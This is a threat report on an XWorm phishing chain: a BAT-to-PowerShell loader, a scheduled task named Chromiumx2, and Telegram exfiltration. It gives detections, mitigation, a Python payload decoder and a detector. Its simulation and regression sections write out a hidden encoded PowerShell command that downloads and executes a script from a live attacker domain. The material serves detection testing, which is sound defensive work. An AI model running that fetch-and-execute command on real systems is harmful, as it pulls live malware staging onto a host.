Malicious Script Delivering More Maliciousness
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A phishing email delivers a malicious attachment containing a BAT script that launches PowerShell to pull down a Base64-encoded payload. After decoding, the payload resolves to XWorm, a .NET stealer that fingerprints the host and exfiltrates collected data through a Telegram bot. Persistence is established by creating a scheduled task that repeatedly runs the dropped executable. The operation relies on multiple infrastructure elements, including a fake image-hosting lure and at least one compromised IP used for payload staging.
Investigation
Review of the BAT script exposed a PowerShell one-liner that retrieves a PNG-looking file from an attacker-controlled domain. The embedded Base64 content is then sanitized, reversed, and decoded to reconstruct the .NET executable. Binary analysis showed the malware registers a scheduled task named Chromiumx2 and uses Telegram’s API for command-and-control and data exfiltration. Investigators extracted key network indicators, including the hosting domain, associated IP address, and the Telegram API endpoint referenced during execution.
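The reconstruction chain described above (carve the Base64 out of the PNG-looking file, reverse it, decode it, confirm the result is an executable), as an added Python example that is not code from the page or from the investigators. The write-up does not say what its sanitization step strips, so the example assumes the lure is a fake PNG signature followed by the reversed Base64 with line breaks and filler characters mixed in; the payload is a constructed DOS/PE stub standing in for the real XWorm binary, and build_lure constructs that sample so the decoder runs offline.

```python
"""Carve, reverse and decode the Base64 embedded in a PNG-looking lure to
recover the staged executable, then sanity-check it as a PE file.
Added example: the write-up does not say what its sanitization step removes,
so junk is assumed to be anything outside the Base64 alphabet after a fake
PNG signature, and the payload is a constructed stand-in, not XWorm."""
import base64
import re

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
B64_CHARS = re.compile(rb"[A-Za-z0-9+/=]")

# Constructed stand-in for the dropped .NET binary: DOS header with e_lfanew
# pointing at a PE signature, followed by filler (not a runnable assembly).
FAKE_PE = (b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little")
           + b"PE\x00\x00" + b"constructed-stand-in-for-the-dotnet-payload")


def build_lure(payload):
    """Build the constructed lure: PNG signature, then the payload's Base64
    written backwards with line breaks and non-Base64 filler interleaved."""
    reversed_b64 = base64.b64encode(payload)[::-1]
    chunks = [reversed_b64[i:i + 24] for i in range(0, len(reversed_b64), 24)]
    return PNG_MAGIC + b"##--##\r\n" + b"\r\n".join(chunks) + b"\r\n##--##"


def carve_base64(data):
    """Sanitize: drop the fake image header first (its 'PNG' bytes are valid
    Base64 characters and would corrupt the decode), then keep only Base64
    characters, which removes line breaks and filler."""
    if data.startswith(PNG_MAGIC):
        data = data[len(PNG_MAGIC):]
    return b"".join(B64_CHARS.findall(data))


def reconstruct(data):
    """Carve, undo the reversal, repair any padding lost to sanitizing, decode."""
    b64 = carve_base64(data)[::-1]
    b64 += b"=" * (-len(b64) % 4)
    return base64.b64decode(b64)


def is_pe(blob):
    """Cheap triage before handing the blob to a .NET decompiler: MZ magic and
    an e_lfanew offset that lands on the PE signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


if __name__ == "__main__":
    recovered = reconstruct(build_lure(FAKE_PE))
    print("PE recovered:", is_pe(recovered), "size:", len(recovered))
```

A recovered blob that passes is_pe can go straight to a .NET decompiler; one that fails usually means the carve kept bytes from the lure header or the reversal was applied at the wrong stage, so check those two steps before suspecting a different encoding.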
Mitigation
Prevent execution of untrusted BAT and PowerShell content originating from email attachments or user download directories. Apply application allow-listing so that executables dropped into user-writable locations such as the Public user profile cannot run, and alert on new scheduled task registrations whose action points at such locations. Monitor and, where feasible, restrict outbound access to Telegram API endpoints and block the identified malicious domains at DNS/proxy layers. Keep endpoint detections updated with newly observed indicators and script-based download patterns.
Response
Isolate endpoints where the Chromiumx2 scheduled task or Chromiumx2.exe is observed. Remove the scheduled task, delete the malicious binary, and collect artifacts (script, decoded payload, task XML, and relevant logs) for forensic scoping. Hunt across the environment for the same task name, similar PowerShell decode behavior, and Telegram-driven traffic. Reset potentially exposed credentials and notify users about the phishing attachment to reduce repeat execution.
Attack Flow
Detections
- Possible Telegram Abuse As Command And Control Channel (via dns_query)
- Suspicious Process Utilizes a URL in the Command Line (via cmdline)
- Download or Upload via Powershell (via cmdline)
- Schtasks Points to Suspicious Directory / Binary / Script (via cmdline)
- Suspicious Powershell Strings (via powershell)
- Suspicious Files in Public User Profile (via file_event)
- Suspicious Powershell Strings (via cmdline)
- Possible Schtasks or AT Usage for Persistence (via cmdline)
- IOCs (SourceIP) to detect: Malicious Script Delivering More Maliciousness
- IOCs (DestinationIP) to detect: Malicious Script Delivering More Maliciousness
- Scheduled Task Creation for Chromiumx2 Persistence [Windows Process Creation]
- Detect Base64-Encoded PowerShell Payload Fetch [Windows Powershell]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Attack Narrative & Commands:
The attacker wants to download and execute a malicious payload from a compromised web server. To evade classic signature detection, they embed the entire download-and-execute logic in a single Base64 string and invoke PowerShell with -EncodedCommand. The command references the exact URL that the detection rule monitors (https://uniworldrivercruises-co.uk/optimized_MSI.png). Because that URL is live attacker infrastructure, run the simulation only on an isolated lab host with outbound access blocked or the domain sinkholed; the rule fires on the process-creation and script-block telemetry, not on a successful download.
Encode the malicious payload (a simple downloader that runs the received script). Note that -EncodedCommand expects Base64 over UTF-16LE, which is why [Text.Encoding]::Unicode is used rather than UTF8:
    $payload = "IEX (New-Object Net.WebClient).DownloadString('https://uniworldrivercruises-co.uk/optimized_MSI.png')"
    $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
    Write-Host $b64
Resulting B64 (example):
    SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAu...(truncated)
Execute the encoded command:
    powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAu...
This single line generates the exact telemetry the Sigma rule expects: a PowerShell process, the -EncodedCommand flag, and the malicious URL inside the decoded script block.
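Those three telemetry properties are what a rule has to check, and the decode step (Base64 over UTF-16LE, accepted after any unambiguous prefix of -EncodedCommand such as -e or -enc) is where home-grown detections most often go wrong. The following Python is an added example, not the page's or the detection platform's own rule logic: it runs that check over three constructed process-creation events (the simulation command above re-encoded, the Chromiumx2 schtasks registration from the write-up, and a benign PowerShell invocation). The event shape, rule names and user-writable path list are the example's own assumptions; the domain and task name are the indicators the page reports.

```python
"""Decode PowerShell -EncodedCommand blobs from process-creation telemetry and
flag the download-and-execute and schtasks patterns from the write-up.
Added example; event shape, rule names and path list are assumptions."""
import base64
import re
from urllib.parse import urlparse

# The page's simulation payload, re-encoded so the constructed event below
# carries a real -EncodedCommand blob (constructed, not captured telemetry).
SIM_PAYLOAD = ("IEX (New-Object Net.WebClient).DownloadString("
               "'https://uniworldrivercruises-co.uk/optimized_MSI.png')")
SIM_B64 = base64.b64encode(SIM_PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events in a Sysmon EID 1 / Security 4688 shape.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell -NoProfile -WindowStyle Hidden -EncodedCommand {SIM_B64}"},
    {"id": 2, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 1 /tn Chromiumx2 '
                r'/tr "C:\Users\Public\Chromiumx2.exe" /f'},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Date"},
]

# Indicators taken from the write-up.
IOC_DOMAINS = {"uniworldrivercruises-co.uk"}
IOC_TASK_NAMES = {"chromiumx2"}

DOWNLOAD_PRIMITIVES = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b|"
    r"Invoke-RestMethod|\birm\b|Net\.WebClient|Start-BitsTransfer", re.IGNORECASE)
EXEC_PRIMITIVES = re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)
# Directories an unprivileged user can write to (assumed list; extend per estate).
USER_WRITABLE = re.compile(r"\\(?:Users\\Public|AppData|Temp|Downloads|ProgramData)\\",
                           re.IGNORECASE)
FLAG_RE = re.compile(r"(?:^|\s)-(\w+)\s+([A-Za-z0-9+/=]{8,})")


def extract_encoded_command(cmdline):
    """Return the blob after -EncodedCommand or any unambiguous prefix of it
    (-e, -ec, -enc, ...), all of which powershell.exe accepts."""
    for flag, blob in FLAG_RE.findall(cmdline):
        flag = flag.lower()
        if flag.startswith("e") and "encodedcommand".startswith(flag):
            return blob
    return None


def decode_encoded_command(blob):
    """-EncodedCommand is Base64 over UTF-16LE; decoding it as UTF-8 gives
    NUL-laced text that plain substring rules then miss."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    return raw.decode("utf-16-le", errors="replace")


def check_powershell(cmdline):
    """Rules that fire on a PowerShell command line or on its decoded script
    block. Returns (rule, detail) pairs."""
    hits = []
    blob = extract_encoded_command(cmdline)
    script = decode_encoded_command(blob) if blob else cmdline
    if blob:
        hits.append(("encoded_command_present", script.strip()))
    urls = URL_RE.findall(script)
    for url in urls:
        hits.append(("url_in_command_line", url))
        host = (urlparse(url).hostname or "").lower()
        if host in IOC_DOMAINS:
            hits.append(("ioc_domain", host))
    if urls and DOWNLOAD_PRIMITIVES.search(script):
        hits.append(("powershell_download", urls[0]))
        # Encoded command + download primitive + in-memory execution: the
        # combination the page's Base64 payload-fetch rule is after.
        if blob and EXEC_PRIMITIVES.search(script):
            hits.append(("base64_payload_fetch", urls[0]))
    return hits


def check_schtasks(cmdline):
    """Rules for schtasks registrations: any /create, a /tr target inside a
    user-writable directory, and the task name reported in the write-up."""
    hits = []
    if not re.search(r"schtasks(?:\.exe)?\b.*?/create\b", cmdline, re.IGNORECASE):
        return hits
    hits.append(("schtasks_create", cmdline))
    m_tn = re.search(r'/tn\s+"?([^"\s]+)', cmdline, re.IGNORECASE)
    m_tr = re.search(r'/tr\s+(?:"([^"]+)"|(\S+))', cmdline, re.IGNORECASE)
    task_run = (m_tr.group(1) or m_tr.group(2)) if m_tr else ""
    if USER_WRITABLE.search(task_run):
        hits.append(("schtasks_user_writable_path", task_run))
    if m_tn and m_tn.group(1).lower() in IOC_TASK_NAMES:
        hits.append(("ioc_task_name", m_tn.group(1)))
    return hits


def run_detections(events):
    """Route each event by image name and collect findings as dicts."""
    findings = []
    for ev in events:
        image = ev["image"].lower()
        if image.endswith(("powershell.exe", "pwsh.exe")):
            hits = check_powershell(ev["cmdline"])
        elif image.endswith("schtasks.exe"):
            hits = check_schtasks(ev["cmdline"])
        else:
            hits = []
        findings.extend({"id": ev["id"], "rule": r, "detail": d} for r, d in hits)
    return findings


if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS):
        print(f"event {f['id']}: {f['rule']}: {f['detail'][:80]}")
```

Running it against the three sample events flags the first on all five PowerShell rules and the second on all three schtasks rules while the benign Get-Date invocation produces nothing; the same functions can be pointed at exported 4688 or Sysmon command lines to hunt for the pattern across an estate.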
Regression Test Script:
    #-------------------------------------------------
    # Regression script to trigger the detection rule
    #-------------------------------------------------
    # 1. Build the malicious payload
    $payload = "IEX (New-Object Net.WebClient).DownloadString('https://uniworldrivercruises-co.uk/optimized_MSI.png')"
    $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
    # 2. Execute the payload via an encoded PowerShell command
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -EncodedCommand $b64" `
        -WindowStyle Hidden -PassThru | Out-Null
    Write-Host "Malicious encoded command executed."
    #-------------------------------------------------
Cleanup Commands:
    # Remove any transient files (none expected because the payload streams directly)
    # Terminate any lingering hidden PowerShell processes started by the test.
    # Get-Process does not expose the command line of an already running process
    # ($_.StartInfo is empty for it), so query Win32_Process for the command line instead.
    Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe'" -ErrorAction SilentlyContinue |
        Where-Object { $_.CommandLine -match '-EncodedCommand' } |
        ForEach-Object { Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue }
    Write-Host "Cleanup complete."